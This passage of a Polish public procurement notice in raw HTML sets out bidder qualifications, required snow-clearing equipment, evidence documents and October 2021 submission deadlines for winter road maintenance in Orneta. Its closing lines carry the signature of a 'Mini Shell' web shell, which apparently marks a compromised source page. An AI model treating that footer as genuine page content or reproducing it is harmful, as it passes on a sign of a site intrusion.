KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu dotyczący<br/>zdolności technicznej lub zawodowej, jeżeli wykaże, że:<br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie wykonał lub w przypadku świadczeń okresowych i ciągłych wykonuje usługę(i) polegającą(e) na: <br/>-1 usługę (w ramach 1 umowy) polegająca na zimowym utrzymaniu dróg/ulic/placów/parkingów w zakresie odśnieżania i/lub zwalczania śliskości, o łącznej długości co najmniej 15 km która zrealizowana była w ciągu minimum jednego sezonu zimowego (jeżeli okres działalności jest krótszy, to w tym okresie) wraz z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie.<br/>b)dysponuje lub będzie dysponował potencjałem technicznym tj. technicznie sprawnymi jednostkami sprzętowymi gwarantującymi efektywne prowadzenie akcji zimowej <br/>Wymagana minimalna ilość i rodzaj jednostek sprzętowych:<br/>a.	min. 2 piaskarki (rozsypywarki) lub sprzęt równoważny<br/>b.	min. 3 pługi odśnieżne w tym:<br/>-	min. 2 pługi lemieszowe odśnieżne typ średni<br/>-	min. 1 pług lemieszowy odśnieżny typ ciężki<br/>c.	min. 4(2,2 nośniki (samochody ciężarowe, ciągniki, inne pojazdy) odpowiedniej mocy i ładowności w tym:<br/>-	min. 1 nośnik dostosowany do wyposażenia w pług lemieszowy odśnieżny typ średni<br/>-	min. 1 nośniki dostosowane do wyposażenia w pług lemieszowy odśnieżny typ ciężki<br/>- min. 2 nośniki dostosowane do wyposażenia w pługi lemieszowe odśnieżne typ średni i piaskarki (rozsypywarki)<br/>d.	min 1 spycharko – ładowarka lub sprzęt równoważny (np. 1 spycharka + 1 ładowarka)<br/> e. min. 2 środki transportowe samowyładowcze o ładowności min. 8 ton <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – zgodnie z Załącznikiem nr 9 do IDW Rozdziału II SWZ;<br/>2)Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3)Dokumenty podmiotów zagranicznych<br/>a) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast dokumentu, o których mowa w pkt 2 powyżej , składa dokument lub dokumenty wystawione w<br/>kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że<br/>nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach<br/>miejsca wszczęcia tej procedury.<br/>b)Dokument, o którym mowa w pkt 3 lit. a) , powinien być wystawiony nie wcześniej niż 3 miesiące<br/>przed jego złożeniem.<br/>c)Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje siędokumentów, o których mowa w pkt 3 lit. a) , zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/>notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania wykonawcy. Przepis pkt 3 lit. b) stosuje się.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się<br/>lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały<br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy - zgodnie z Załącznikiem nr 7 do IDW Rozdziału II SWZ<br/>2)Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu<br/>wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami<br/>zgodnie z Załącznikiem nr 8 do IDW Rozdziału II SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz cenowy – zgodnie z Załącznikiem nr 2 do IDW Rozdziału II SWZ ,<br/>2) oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu w zakresie<br/>wskazanym przez Zamawiającego oraz niepodleganiu wykluczeniu z postępowania, o którym<br/>mowa w § 10 ust. 1 IDW Rozdziału I SWZ– zgodnie z Załącznikiem nr 3 do IDW Rozdziału II<br/>SWZ<br/>3) oświadczenie Podmiotu udostępniającego zasoby o spełnianiu warunków udziału w<br/>postępowaniu w zakresie w jakim wykonawca powołuje się na jego zasoby oraz braku podstaw<br/>do wykluczenia z postępowania, o którym mowa w § 9 ust. 7 IDW Rozdziału I SWZ– zgodnie z<br/>Załącznikiem nr 4 do IDW Rozdziału II SWZ (jeżeli dotyczy)<br/>4) zobowiązanie Podmiotu udostępniającego zasoby do oddania do dyspozycji wykonawcy<br/>niezbędnych zasobów na potrzeby realizacji, o którym mowa w § 9 ust. 4 IDW Rozdziału I SWZ–<br/>złożone np. wg Załącznika nr 5 do IDW Rozdziału II SWZ lub inny podmiotowy środek<br/>dowodowy (jeżeli dotyczy),<br/>5) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na<br/>podstawie art. 117 ust. 4 ustawy Pzp, o którym mowa w § 11 ust. 6 IDW Rozdziału I SWZ–<br/>zgodnie z Załącznikiem nr 6 do IDW Rozdziału II SWZ (jeżeli dotyczy)<br/>6) dokumenty, z których wynika prawo do podpisania oferty. W celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda<br/>od Wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba, że Zamawiający<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, a Wykonawca w<br/>formularzu oferty wskazał dane (tj. nr KRS, nr NIP lub REGON) umożliwiające dostęp do tych<br/>dokumentów, w odniesieniu do Wykonawcy jak również do podmiotów udostępniających<br/>zasoby.;<br/>7) odpowiednie pełnomocnictwa (jeżeli dotyczy);<br/>- pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy lub podmiotu udostępniającego zasoby chyba, że umocowanie do reprezentacji<br/>wynika z dokumentów, o których mowa w pkt 6 powyżej;<br/>- pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik<br/>może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo<br/>powinno być załączone do oferty i zawierać w szczególności wskazanie:<br/>1)postępowania o udzielenie zamówienia, którego dotyczy;<br/>2)wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z<br/>nazwy z określeniem adresu siedziby;<br/>3)ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w § 10 ust. 1 IDW Rozdziału I SWZ składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków w zakresie,<br/>w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są<br/>wymagane.<br/>5. W przypadku, o którym mowa w ust. 4 powyżej, wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia zgodnie z art. 117 ust. 4 ustawy Pzp dołączają do oferty oświadczenie, z<br/>którego wynika, które usługi wykonają poszczególni wykonawcy - zgodnie z Załącznikiem nr 6<br/>do IDW Rozdziału II SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający określił rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia w Załączniku<br/>Nr 4 do Projektu umowy Rozdziału IV SWZ , dostępnego na stronie prowadzonego<br/>postępowania https://platformazakupowa.pl/pn/orneta <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/orneta</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-22 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawca może złożyć tylko jedną ofertę<br/>2. Oferta powinna być:<br/>a) sporządzona na podstawie załączników do IDW Rozdziału II SWZ w języku polskim,<br/>b)złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem<br/>platformazakupowa.pl, pod adresem https://platformazakupowa.pl/pn/orneta,<br/>c) podpisana kwalifikowanym podpisem elektronicznym lub podpisem<br/>zaufanym lub podpisem osobistym (e-dowód) przez osobę/osoby upoważnioną / upoważnione

Creat By MiNi SheLL
Email: jattceo@gmail.com